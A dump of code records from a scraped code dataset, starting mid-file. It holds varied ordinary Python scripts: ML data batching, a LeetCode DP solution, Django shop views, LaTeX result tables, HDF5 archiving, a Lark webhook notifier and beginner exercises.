y_train, y_test = train_test_split(A, b, test_size=0.2)\n \n return X_train, X_test, y_train, y_test\n\ndef arraytoDf(array1, array2):\n\n seq = []\n seqLen = []\n sentiment = []\n\n for i in range(len(array1)):\n seq.append(array1[i])\n seqLen.append(len(array1[i]))\n sentiment.append(transY(array2[i]))\n\n dic = {'seq' : seq, 'seqLength' : seqLen, 'sentiment' : sentiment}\n df = pd.DataFrame(dic, columns=['seq', 'seqLength', 'sentiment'])\n return df\n\nclass Data():\n def __init__(self, df):\n self.df = df\n self.size = len(self.df)\n self.epochs = 0\n self.shuffle()\n\n def shuffle(self):\n self.df = self.df.sample(frac=1).reset_index(drop=True)\n self.cursor = 0\n\n def next_batch(self, n):\n if self.cursor+n-1 > self.size:\n self.epochs += 1\n self.shuffle()\n res = self.df.ix[self.cursor:self.cursor+n-1]\n self.cursor += n\n return res['seq'], res['sentiment'], res['seqLength']\n \n#padding\nclass PaddedData(Data):\n def next_batch(self, n):\n if self.cursor+n > self.size:\n self.epochs += 1\n self.shuffle()\n res = self.df.ix[self.cursor:self.cursor+n-1]\n self.cursor += n\n\n # Pad sequences with 0s so they are all the same length\n maxlen = max(res['seqLength'])\n x = np.zeros([n, maxlen], dtype=np.int32)\n for i, x_i in enumerate(x):\n x_i[:res['seqLength'].values[i]] = res['seq'].values[i]\n\n return x, res['sentiment'], res['seqLength']\n \n\n\n","sub_path":"CODE/core/prepo.py","file_name":"prepo.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"352593039","text":"'''\r\n假如有一排房子,共 n 个,每个房子可以被粉刷成 k 种颜色中的一种,你需要粉刷所有的房子并且使其相邻的两个房子颜色不能相同。\r\n\r\n当然,因为市场上不同颜色油漆的价格不同,所以房子粉刷成不同颜色的花费成本也是不同的。每个房子粉刷成不同颜色的花费是以一个 n x k 的矩阵来表示的。\r\n\r\n例如,costs[0][0] 表示第 0 号房子粉刷成 0 号颜色的成本花费;costs[1][2] 表示第 1 号房子粉刷成 2 号颜色的成本花费,以此类推。请你计算出粉刷完所有房子最少的花费成本。\r\n\r\n注意:\r\n\r\n所有花费均为正整数。\r\n\r\n示例:\r\n\r\n输入: [[1,5,3],[2,9,4]]\r\n输出: 5\r\n解释: 将 0 号房子粉刷成 0 号颜色,1 号房子粉刷成 2 号颜色。最少花费: 1 + 4 = 5;\r\n 或者将 0 号房子粉刷成 2 号颜色,1 号房子粉刷成 0 号颜色。最少花费: 3 + 2 = 5.\r\n进阶:\r\n您能否在 O(nk) 的时间复杂度下解决此问题?\r\n'''\r\nfrom typing import List\r\n\r\nfrom leetcode.tools.time import printTime\r\n\r\n\r\nclass Solution:\r\n @printTime()\r\n def minCostII(self, costs: List[List[int]]) -> int:\r\n self.len = len(costs)\r\n self.k = len(costs[0])\r\n dp = [[0 for _ in range(self.k)] for _ in range(self.len)]\r\n dp[0] = costs[0]\r\n min1 = None\r\n min2 = None\r\n for i in range(self.k):\r\n if min1 is None and min2 is None:\r\n min1 = i\r\n elif min2 is None:\r\n if dp[0][i] <= dp[0][min1]:\r\n min2 = min1\r\n min1 = i\r\n else:\r\n min2 = i\r\n else:\r\n if dp[0][i] <= dp[0][min1]:\r\n min2 = min1\r\n min1 = i\r\n elif dp[0][i] < dp[0][min2]:\r\n min2 = i\r\n for i in range(1, self.len):\r\n t1 = None\r\n t2 = None\r\n for j in range(self.k):\r\n if j != min1:\r\n dp[i][j] = costs[i][j] + dp[i - 1][min1]\r\n else:\r\n dp[i][j] = costs[i][j] + dp[i - 1][min2]\r\n if t1 is None and t2 is None:\r\n t1 = j\r\n elif t2 is None:\r\n if dp[i][j] <= dp[i][t1]:\r\n t2 = t1\r\n t1 = j\r\n else:\r\n t2 = j\r\n else:\r\n if dp[i][j] <= dp[i][t1]:\r\n t2 = t1\r\n t1 = j\r\n elif dp[i][j] < dp[i][t2]:\r\n t2 = j\r\n min1 = t1\r\n min2 = t2\r\n return dp[self.len - 1][min1]\r\n\r\ncosts = [[1,5,3],[2,9,4]]\r\nSolution().minCostII(costs)\r\nSolution()._1minCostII(costs)","sub_path":"leetcode/dynamic programming/5. 带维度单串dp[i][k],i为位置,k为附加维度/0265_H_粉刷房子 II_DP.py","file_name":"0265_H_粉刷房子 II_DP.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"163821141","text":"import processresults as pr\n\ntableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),\n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),\n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),\n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),\n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]\n\nfor i in range(len(tableau20)):\n r, g, b = tableau20[i]\n tableau20[i] = (r / 255., g / 255., b / 255.)\n\nDATA = [\"Helpdesk.csv\", \"BPIC12W.csv\", \"BPIC12.csv\", \"BPIC15_1_sorted_new.csv\", \"BPIC15_2_sorted_new.csv\",\n \"BPIC15_3_sorted_new.csv\", \"BPIC15_4_sorted_new.csv\", \"BPIC15_5_sorted_new.csv\"]\n# METHODS = [\"Tax\", \"Taymouri\", \"Camargo random\", \"Camargo argmax\", \"Lin\", \"Di Mauro\", \"EDBN\", \"Baseline\", \"Pasquadibisceglie\"]\n# METHODS = [\"Tax\", \"Camargo argmax\", \"Lin\", \"Di Mauro\", \"Pasquadibisceglie\", \"Taymouri\", \"EDBN\", \"Baseline\", \"New\", \"EDBN_update\"]\nMETHODS = [\"Tax\", \"Camargo argmax\", \"Lin\", \"Di Mauro\", \"Pasquadibisceglie\", \"Taymouri\", \"EDBN\", \"Baseline\"]\nSETTINGS = [\"Tax\", \"Camargo\", \"Lin\", \"Di Mauro\", \"Pasquadibisceglie\", \"Taymouri\", \"Baseline\"]\n\nscores = {}\nscores_detail = {}\n\nfor setting in SETTINGS:\n results = pr.read_result_file(\"paper_%s.txt\" % (setting.lower().replace(\" \", \"\")))\n scores[setting] = results[METHODS].mean().sort_values()\n scores_detail[setting] = results\n\nLATEX_ROW = {}\n\nfor setting in SETTINGS:\n score = scores[setting]\n i = 8\n for score_item in score.iteritems():\n print(score_item)\n if score_item[0] not in LATEX_ROW:\n LATEX_ROW[score_item[0]] = \"\"\n if i == 1:\n LATEX_ROW[score_item[0]] += \"& \\\\textbf{%i \\\\emph{(%.2f)}} \" % (i, score_item[1])\n else:\n LATEX_ROW[score_item[0]] += \"& %i \\\\emph{(%.2f)} \" % (i, score_item[1])\n i -= 1\n\nprint(\"OVERALL AVERAGE\")\nfor method in METHODS:\n print(method, LATEX_ROW[method], \"\\\\\\\\\")\n\n\nfor key in scores_detail:\n print(key)\n LATEX_ROW = {}\n\n cols = [\"data\"]\n cols.extend(METHODS)\n score = scores_detail[key][cols]\n print(\"\\\\begin{table*}\")\n print(\"\\\\scriptsize\")\n print(\"\\\\begin{tabular}{c | c c c c c c c c}\")\n\n print(\" & \".join(cols), end=\"\\\\\\\\\\n\")\n print(\"\\hline\")\n for score_item in score.iterrows():\n print(score_item[1][0].replace(\"_\", \"\\_\"), \"&\", \" & \".join([ \"%.2f\" % s if s != max(score_item[1][1:]) else \"\\\\textbf{%.2f}\" % s for s in list(score_item[1][1:])]), end=\"\\\\\\\\\\n\")\n print(\"\\\\end{tabular}\")\n print(\"\\\\end{table*}\")\n\n\n","sub_path":"Predictions_Results/Paper/process_paper.py","file_name":"process_paper.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"44291747","text":"import utils\nimport params\nimport cv2 as cv\nimport pdb\n\ndef predict(images=None, path_images=None, scale_factor=params.scale, interpolation_method=params.interpolation_method): \n\n if(type(images) != type(None)):\n original_image = images\n else:\n if(path_images == None):\n raise ValueError('if images is None path_images must not be none.')\n original_image = utils.read_all_images_from_directory(path_images) \n \n # standard resize\n downscaled_image = utils.resize_3d_image_standard(original_image, int(original_image.shape[0] / scale_factor), int(original_image.shape[1] / scale_factor), int(original_image.shape[2] / scale_factor))\n standard_resize = utils.resize_3d_image_standard(downscaled_image, int(original_image.shape[0]), int(original_image.shape[1]), int(original_image.shape[2]), interpolation_method=interpolation_method) \n \n num_images = standard_resize.shape[0]\n sum_ssim_standard = 0 \n sum_psnr_standard = 0 \n\n for index in range(num_images): \n psnr_standard = utils.psnr(original_image[index, :, :], standard_resize[index, :, :])\n ssim_standard = utils.ssim(original_image[index, :, :], standard_resize[index, :, :]) \n \n sum_ssim_standard += ssim_standard\n sum_psnr_standard += psnr_standard \n print('standard --- psnr = {} ssim = {}'.format(sum_psnr_standard, sum_ssim_standard)) \n return sum_psnr_standard, sum_ssim_standard, num_images\n \n\nlist_images = utils.read_all_directory_images_from_directory_test('./data/train') \nsum_ssim_standard = 0 \nsum_psnr_standard = 0 \nnum_images_all = 0\nfor images in list_images:\n psnr_standard, ssim_standard, num_images = predict(images=images, interpolation_method=cv.INTER_NEAREST)\n sum_ssim_standard += ssim_standard\n sum_psnr_standard += psnr_standard \n num_images_all += num_images\n \nprint('standard --- psnr = {} ssim = {}'.format(sum_psnr_standard / num_images_all, sum_ssim_standard / num_images_all)) ","sub_path":"cnn/HWD-resize/standard_resize.py","file_name":"standard_resize.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"96893877","text":"from django.shortcuts import render, get_object_or_404,redirect\nfrom django.http import HttpResponse\nfrom .models import Category, Product, Cart, CartItem\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.models import Group, User\nfrom .forms import SignUpForm\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import login, authenticate, logout\n\ndef home(request, category_slug = None):\n\tproducts=None\n\tcategory_page=None\n\tif category_slug != None:\n\t\tcategory_page = get_object_or_404(Category, slug = category_slug)\n\t\tproducts = Product.objects.filter(category=category_page, available=True)\n\telse:\n\t\tproducts = Product.objects.all().filter(available=True)\n\n\treturn render(request, 'home.html', {'products':products, 'category_page':category_page})\n\n\n\ndef product(request, category_slug, product_slug):\n\t\n\ttry:\n\t\tproduct = Product.objects.get(category__slug=category_slug, slug= product_slug)\n\n\texcept Exception as e:\n\t\traise e\n\n\treturn render(request, 'product.html',{'product': product})\n\n\ndef _cart_id(request):\n\t#создаем или получаем сессию\n\tcart = request.session.session_key\n\tif not cart:\n\t\tcart = request.session.create()\n\treturn cart\n\n\ndef add_cart(request, product_id):\n\tproduct = Product.objects.get(id= product_id)\n\t#создаем или получаем корзину из бд\n\ttry:\n\t\tcart= Cart.objects.get(cart_id=_cart_id(request))\n\texcept Cart.DoesNotExist:\n\t\tcart = Cart.objects.create(cart_id=_cart_id(request))\n\t\tcart.save()\n\t#добавление товара в корзину\n\ttry:\n\t\tcart_item= CartItem.objects.get(cart= cart, product=product)\n\t\tif cart_item.quantity < cart_item.product.stock:\n\t\t\tcart_item.quantity +=1\n\t\tcart_item.save()\n\t\n\texcept CartItem.DoesNotExist:\n\t\tcart_item= CartItem.objects.create(cart= cart, product=product, quantity=1)\n\t\tcart_item.save()\n\n\treturn redirect('cart_detail')\n\ndef cart_detail(request, total=0, counter=0, cart_items=None):\n\ttry:\n\t\t#получаем карзину и товары в корзине по сессии пользователя\n\t\tcart = Cart.objects.get(cart_id = _cart_id(request))\n\t\tcart_items = CartItem.objects.filter(cart=cart, )\n\t\t#счет итоговой стоимости и количества\n\t\tfor cart_item in cart_items:\n\t\t\ttotal += cart_item.product.price * cart_item.quantity\n\t\t\tcounter += cart_item.quantity \n\texcept ObjectDoesNotExist:\n\t\tpass\n\n\treturn render(request, 'cart.html', {'cart_items':cart_items,'total':total,'counter': counter})\n\n\ndef remove_cart(request, product_id):\n\tcart = Cart.objects.get(cart_id=_cart_id(request),)\n\tproduct = Product.objects.get(id= product_id) \n\tcart_item = CartItem.objects.get(product=product, cart=cart)\n\tif cart_item.quantity > 1:\n\t\tcart_item.quantity -= 1\n\t\tcart_item.save()\n\telse:\n\t\tcart_item.delete()\n\n\treturn redirect('cart_detail')\n\n\ndef remove_cart_product(request, product_id):\n\tcart = Cart.objects.get(cart_id=_cart_id(request),)\n\tproduct = Product.objects.get(id= product_id) \n\tcart_item = CartItem.objects.get(product=product, cart=cart)\n\tcart_item.delete()\n\treturn redirect('cart_detail')\n\n\ndef signUpView(request):\n\tif request.method == \"POST\":\n\t\tform = SignUpForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tusername = form.cleaned_data.get('username')\n\t\t\tsignup_user= User.objects.get(username=username)\n\t\t\tuser_group = Group.objects.get(name='User')\n\t\t\tuser_group.user_set.add(signup_user)\n\n\telse:\n\t\tform= SignUpForm()\n\treturn render(request,'signup.html',{'form':form})\n\n\ndef loginView(request):\n\tif request.method == 'POST':\n\t\tform = AuthenticationForm(data=request.POST)\n\t\tif form.is_valid():\n\t\t\tusername= request.POST['username']\n\t\t\tpassword= request.POST['password']\n\t\t\tuser = authenticate(username=username, password=password)\n\t\t\tif user is not None:\n\t\t\t\tlogin(request, user)\n\t\t\t\treturn redirect('home')\n\t\t\telse:\n\t\t\t\treturn redirect('signup')\n\n\telse:\n\t\tform = AuthenticationForm()\n\t\treturn render(request, 'login.html', {'form':form})\n\n\ndef logoutView(request):\n\tlogout(request)\n\treturn redirect('login')","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"616373006","text":"import mdfreader\nimport pandas\nimport sys\nimport os\ndef parseMDF(filename):\n if(os.path.exists(filename)):\n mdf=mdfreader.mdf(filename,channelList=['Epm_nEng','InjCtl_qSetUnBal'])\n mdf.convertToPandas(0.1)\n mdf['master_group'].to_csv(\"ss.csv\")\n print(\"done!\")\n else:\n print(\"Sorry, please check the filename. Usage: Python \" +__file__ + \" filename.mdf\")\n\n\n\nif __name__==\"__main__\":\n parseMDF(sys.argv[1])\n","sub_path":"readdata.py","file_name":"readdata.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"11295660","text":"from __future__ import with_statement\nfrom ..excel_comparsion_test import ExcelComparisonTest\nfrom ...workbook import Workbook\nfrom ...canvas import Canvas\n\n\nclass TestCompareXLSXFiles(ExcelComparisonTest):\n \"\"\"\n Test file created by XlsxWriter against a file created by Excel.\n\n \"\"\"\n\n def setUp(self):\n self.set_filename('simple01.xlsx')\n\n def test_create_file(self):\n \"\"\"Test the creation of a simple workbook.\"\"\"\n\n workbook = Workbook(self.got_filename)\n worksheet = workbook.add_worksheet()\n\n c = Canvas(2, 1)\n c.set_data(0, 0, 'Hello')\n c.set_data(1, 0, 123)\n\n c.write_to_sheet(workbook, worksheet)\n\n workbook.close()\n\n self.assertExcelEqual()\n\n def test_create_file_with_array(self):\n \"\"\"Test the creation of a simple workbook.\"\"\"\n\n workbook = Workbook(self.got_filename)\n worksheet = workbook.add_worksheet()\n\n c = Canvas(2, 1)\n c.set_data(0, 0, [['Hello'], [123]])\n\n c.write_to_sheet(workbook, worksheet)\n\n workbook.close()\n\n self.assertExcelEqual()\n","sub_path":"xlsxwriter/test/canvas/test_simple01.py","file_name":"test_simple01.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"47019132","text":"#!/usr/bin/env python3\nimport glob\nimport os\nimport h5py\nimport numpy as np\nimport cv2\n\nEMPTY_LABEL = \"empty\"\n\n\ndef load_image(filename):\n \"\"\" Load single image from file and preprocess. \"\"\"\n img = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)\n # Apparently TensorFlow needs images transposed.\n img = cv2.transpose(img)\n # Normalize.\n (m, s) = cv2.meanStdDev(img)\n m = m[0][0]\n s = s[0][0]\n img = img - m\n img = img / s if s > 0 else img\n return img\n\n\ndef _to_label(filename):\n \"\"\" Image filenames are formatted as [value].[uuid].png\"\"\"\n prefix = os.path.basename(filename).split(\".\")[0]\n if prefix == EMPTY_LABEL:\n return \" \"\n return prefix\n\n\ndef _save_h5(filename, images, labels):\n with h5py.File(filename, \"w\") as hf:\n hf.create_dataset(\"images\", data=images)\n hf.create_dataset(\"labels\", data=labels)\n\n\ndef archive(source_dir, output):\n img_files = glob.glob(f\"{source_dir}/*png\")\n imgs = np.array([load_image(f) for f in img_files])\n # astype(\"S\") to use ASCII encoding (instead of unicode).\n labels = np.array([_to_label(f) for f in img_files]).astype(\"S\")\n _save_h5(output, imgs, labels)\n\n\ndef load(filename):\n \"\"\" Load training dataset from h5 file. \"\"\"\n result = {}\n with h5py.File(filename, \"r\") as hf:\n result[\"images\"] = hf[\"images\"].value\n # Convert back to unicode (Python 3 strings)\n result[\"labels\"] = hf[\"labels\"].value.astype(\"U\")\n return result\n","sub_path":"training/archive_data.py","file_name":"archive_data.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"645345490","text":"import numpy as np\nimport tensorflow as tf\nimport collections\nimport zipfile\n\ndef readvecfile(filename):\n\tfile = open(filename, 'r')\n\twordvec = dict()\n\twordindex = dict()\n\tfor line in file:\n\t\tline = line.strip(' \\n')\n\t\tdata = line.split(\":\")\n\t\tword = data[0]\n\t\tvec = data[1].split(\" \")\n\t\tvec = map(eval, vec)\n\t\tvec = np.array(vec)\n\t\twordvec[word] = vec\n\t\twordindex[word] = len(wordindex)\n\treturn wordvec, wordindex\n\nwordvec, wordindex = readvecfile(\"true_embed\")\nprint(wordindex)\n\ndef readdata(filename, n_word):\n\tfile = open(filename, 'r')\n\ttext = \"\"\n\tfor l in file:\n\t\ttext = text + l.strip('\\n') + \" \"\n\ttext = text.split(\" \")\n\tcount = [['UNK', -1]]\n\tcount.extend(collections.Counter(text).most_common(n=n_word))\n\tdictionary = dict()\n\tfor word, _ in count:\n\t\tdictionary[word] = len(dictionary)\n\tdata = list()\n\tunk_count = 0\n\tfor word in text:\n\t\tif word in dictionary:\n\t\t\tindex = dictionary[word]\n\t\telse:\n\t\t\tindex = 0\n\t\t\tunk_count += 1\n\t\tdata.append(index)\n\tcount[0][1] = unk_count\n\treverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n\treturn data, count, dictionary, reverse_dictionary\n\ndata, count, dictionary, reverse_dictionary = readdata('english', 100)\n\ndef getembedings(dictionary, wordvec):\n\tembeddings = np.zeros(((len(dictionary),128)))\n\tfor word in dictionary:\n\t\t#print(word)\n\t\tif word in wordvec:\n\t\t\tprint(word)\n\t\t\tembeddings[dictionary[word]] = wordvec[word]\n\treturn embeddings\n\nembeddings = getembedings(dictionary, wordvec)\n#print(embeddings)\nem = tf.Variable(initial_value=embeddings)\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n\tinit.run()\n#\tprint(em[1].eval())\n\n","sub_path":"window_pre/readvec.py","file_name":"readvec.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"177028111","text":"\"\"\"\nUses 'SLURM sacct' to compute the number of CPU and MPP hours\n\"\"\"\n\nimport pandas as pd\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef cpu_hrs(nodes,h,m,s, mpp=False,cori=True):\n \"\"\"\n Args:\n nodes: number of nodes\n h,m,s: hours,min,sec\n \"\"\"\n cores_per_node=32\n if not cori:\n cores_per_node=24\n mpp_factor= 1.\n if mpp:\n mpp_factor= 2.5\n if not cori:\n mpp_factor= 2.\n\n return mpp_factor * cores_per_node * nodes * h + m/60. + s/3600.\n\ndef dobash(cmd):\n print('UNIX cmd: %s' % cmd)\n if os.system(cmd): raise ValueError\n\nif __name__ == '__main__':\n #sacct -A desi --user=kaylanb --format=JobID,State,NNodes,Elapsed,Start -S 11/17/17 -E 12/03/17|grep COMPLETED > my_sacct.txt\n\n from argparse import ArgumentParser\n parser = ArgumentParser()\n parser.add_argument('--sacct_fn', type=str, required=True, help='output of sacct dumped to textfil')\n args = parser.parse_args()\n\n a=pd.read_csv(args.sacct_fn,\n delim_whitespace=True,header=None,\n names=['slurm_id','status','num_nodes','time','start'])\n\n for i,name in zip([0,1,2],['multi_hr','min','sec']):\n a[name]= a['time'].str.split(':').str[i]\n\n print(a['multi_hr'].str.split('-').str.len().value_counts())\n hasExtra24= a['multi_hr'].str.split('-').str.len() > 1\n a['extra_hrs']= np.zeros(a.shape[0])\n a.loc[hasExtra24,'extra_hrs']= 24*a.loc[hasExtra24,'multi_hr'].str.split('-').str[0].astype(float)\n a['extra_hrs'].value_counts()\n\n a['hrs']= np.zeros(a.shape[0])\n # No 01-05, just 05\n a.loc[~hasExtra24,'hrs']= a.loc[~hasExtra24,'multi_hr'].astype(float)\n # When 01-05, just take 05\n a.loc[hasExtra24,'hrs']= a.loc[hasExtra24,'multi_hr'].str.split('-').str[1].astype(float)\n a.loc[:,'hrs'] += a['extra_hrs']\n\n for col in ['min','sec']:\n a.loc[:,col]= a.loc[:,col].astype(float)\n\n a['cpu_hrs']= cpu_hrs(a['num_nodes'],a['hrs'],a['min'],a['sec'])\n print('total cpu hours (M):',a['cpu_hrs'].sum()/1e6)\n print('total MPP hours (M):',a['cpu_hrs'].sum()/1e6*2.5)\n\n\n ## Plots\n fig,ax= plt.subplots(2,2,figsize=(6,6))\n names=['num_nodes','hrs','min','sec']\n i=0\n for row in range(2):\n for col in range(2):\n sns.distplot(a[names[i]],ax=ax[row,col])\n i+=1\n fn='nodes_hrs_min_sec.png'\n plt.savefig(fn,dpi=150)\n print('Wrote %s' % fn)\n","sub_path":"py/obiwan/qa/cpu_hours.py","file_name":"cpu_hours.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"431517958","text":"#Дана дата в формате dd.mm.yyyy, например: 02.11.2013. Ваша задача — вывести дату в текстовом виде,\n# например: второе ноября 2013 года. Склонением пренебречь (2000 года, 2010 года)\nnumber_data = '13.03.1986'\nsplit_data = number_data.split('.')\n\nfibs_days = (0, 'первое', 'второе', 'третье', 'четвертое', 'пятое', 'шестое', 'седьмое', 'восьмое', 'девятое',\n 'десятое', 'одиннадцатое', 'двенадцатое', 'тринадцатое', 'четрынадцатое', 'пятнадцатое', 'шестнадцатое',\n 'семнадцатое', 'восемнадцатое', 'девятнадцатое', 'двадцатое', 'двадцать первое', 'двадцать второе',\n 'двадцать третье', 'двадцать четвертое', 'двадцать пятое', 'двадцать шестое', 'двадцать седьмое',\n 'двадцать восьмое', 'двадцать девятое', 'тридцатое', 'тридцать первое')\n\nfibs_months = (0, 'января', 'феврал', 'марта', 'апреля', 'мая', 'июня', 'июля', 'августа', 'сентября',\n 'октября', 'ноября', 'декабря')\n\nfor i in range(len(fibs_days)):\n if (int(split_data[0])) == i:\n split_data[0] = fibs_days[i]\n break\n\nfor i in range(len(fibs_months)):\n if (int(split_data[1])) == i:\n split_data[1] = fibs_months[i]\n break\n\nprint(split_data[0] + ' ' + split_data[1] + ' ' + split_data[2] + ' ' \"года\" )\n","sub_path":"practice2-2.py","file_name":"practice2-2.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"348066059","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/8/11 16:12\n# @Author : lihuacai\n# @Email : lihuacai168@gmail.com\n# @File : lark_message.py\n# @Software: PyCharm\nimport requests\nimport json\nfrom fastrunner import models\nfrom django.conf import settings\n\n\ndef get_base_post_content():\n return {\n \"msg_type\": \"post\",\n \"content\": {\n \"post\": {\n \"zh_cn\": {\n \"title\": \"\",\n \"content\": [\n ]\n }\n }\n }\n }\n\n\ndef parse_message(summary: dict, msg_type: str):\n task_name = summary[\"task_name\"]\n rows_count = summary['stat']['testsRun']\n pass_count = summary['stat']['successes']\n fail_count = summary['stat']['failures']\n error_count = summary['stat']['errors']\n duration = '%.2fs' % summary['time']['duration']\n report_id = models.Report.objects.last().id\n base_url = settings.IM_REPORT_SETTING.get('base_url')\n port = settings.IM_REPORT_SETTING.get('port')\n report_url = f'{base_url}:{port}/api/fastrunner/reports/{report_id}/'\n executed = rows_count\n fail_rate = '{:.2%}'.format(fail_count / executed)\n # 富文本\n if msg_type == 'post':\n msg_template = get_base_post_content()\n content = [[{'text': f'任务名称:{task_name}'}],\n [{'text': f'总共耗时: {duration}'}],\n [{'text': f'成功接口: {pass_count}'}],\n [{'text': f'异常接口: {error_count}'}],\n [{'text': f'失败接口: {fail_count}'}],\n [{'text': f'失败比例: {fail_rate}'}],\n [{'text': f'查看详情: {report_url}'}]]\n for d in content:\n d[0].update({'tag': 'text'})\n msg_template['content']['post']['zh_cn']['content'] = content\n return msg_template\n text = f\" 任务名称: {task_name}\\n 总共耗时: {duration}\\n 成功接口: {pass_count}个\\n 异常接口: {error_count}个\\n 失败接口: {fail_count}个\\n 失败比例: {fail_rate}\\n 查看详情: {report_url}\"\n return text\n\n\ndef send_message(summary: dict, webhook: str):\n \"\"\"\n\n \"\"\"\n # v1 https://open.feishu.cn/open-apis/bot/hook/xxx\n # v2 https://open.feishu.cn/open-apis/bot/v2/hook/xxx\n title = settings.IM_REPORT_SETTING.get('report_title')\n platform_name = settings.IM_REPORT_SETTING.get('platform_name', 'FasterRunner测试平台')\n if platform_name:\n title = platform_name + title\n version = webhook[37:39]\n if version == 'v2':\n msg = parse_message(summary=summary, msg_type='post')\n msg['content']['post']['zh_cn']['title'] = title\n data = msg\n else:\n msg = parse_message(summary=summary, msg_type=None)\n data = {\n \"title\": title,\n \"text\": msg\n }\n requests.post(url=webhook, data=json.dumps(data).encode(\"utf-8\"))\n","sub_path":"fastrunner/utils/lark_message.py","file_name":"lark_message.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"473258772","text":"import GameFrameWork\n\nfrom pico2d import *\n\n\nclass BackGround:\n def __init__(self):\n self.image1 = load_image('image/stage/stage1_01.png')\n self.image2 = load_image('image/stage/stage1_02.png')\n self.image3 = load_image('image/stage/stage1_03.png')\n #Sound\n self.bgm = load_music('sound/Stage1.mp3')\n self.bgm.set_volume(64)\n self.bgm.repeat_play()\n self.bossBgm = load_music('sound/boss_sound.mp3')\n self.bossBgm.set_volume(64)\n self.width = GameFrameWork.Width\n self.height = 6000\n\n self.x1, self.y1 = self.width / 2, self.height / 2 # 화면 초기값. stage1_01 초기값.\n self.x2, self.y2 = self.width / 2, self.height / 2 + GameFrameWork.Height # stage1_02화면 초기값.\n self.x3, self.y3 = self.width / 2, self.height / 2 + GameFrameWork.Height # stage1_02화면 초기값.\n self.move = 2.5\n\n def update(self, frame_time):\n if self.y1 > -(self.height / 2):\n self.y1 -= self.move\n if self.y1 < -(self.height / 2) + GameFrameWork.Height:\n self.y2 -= self.move\n if (self.y2 < -(self.height / 2) + GameFrameWork.Height) and (self.y3 > -(self.height / 2) + GameFrameWork.Height):\n self.y3 -= self.move\n\n def draw(self):\n self.image1.clip_draw(0, 0, self.width, self.height, self.x1, self.y1)\n self.image2.clip_draw(0, 0, self.width, self.height, self.x2, self.y2)\n self.image3.clip_draw(0, 0, self.width, self.height, self.x3, self.y3)","sub_path":"Return1945/BackGround.py","file_name":"BackGround.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"155367311","text":"import dlvhex\n\n# Python plugin implementation for the rq external atom.\ndef rq(predic):\n for x in dlvhex.getTrueInputAtoms():\n io = {'ind':'money','amalB':'goggles','altD':'yogamat','gansD':'money'}\n inp = x.tuple()[1].value()\n if predic == x.tuple()[0]:\n if inp in io:\n dlvhex.output((io[inp],))\n\n# register function\ndef register():\n dlvhex.addAtom(\"rq\", (dlvhex.PREDICATE, ), 1)\n","sub_path":"example_5_2/example_5_2.py","file_name":"example_5_2.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"427370202","text":"#Q1\r\na=(1,2,3,4,5,'car','bike') #take tupil which contains different types of data type\r\nprint(len(a)) #print the lenth of tupil eg number of varriable\r\n\r\n#Q2\r\nv=(1,5,3,7,33,9) #take a tupil which contain n number\r\nprint(max(v)) #from n numbers find the largest one from tupil and print the larest one\r\nprint(min(v)) #from n numbers find the smallest one from tupil and print the smallest one\r\n\r\n\r\n#Q3\r\nt=(1*2*3*4) #take a tupil and multipe it\r\nprint(t) #print the product of elementspresent in tupil\r\n\r\n#Q4(a)\r\ns1=set((1,2,3,4,5,6,7)) #take a set s1\r\ns2=set((1,3,6)) #take a set s2\r\ns3=s1-s2 #cmp s1 and s2 to have set s3\r\nprint(s3) #print s3 set\r\n\r\n#(b)\r\na1=set((1,2,3,4,5,6,7,8)) #take set a1\r\na2=set((2,4,5,7)) #take set a2\r\na3=a1>=a2 #if a1>=a2 then a1 is a super set of a2\r\nprint(\"a1 is super set of a2\") #print\r\nprint(a3) #print the set a3\r\na4=a1<=a2 #if a1<=a2 the a1 is a1 issub set of a2\r\nprint(\"a1 is a subset of a2 \") #print\r\nprint(a4) #print set 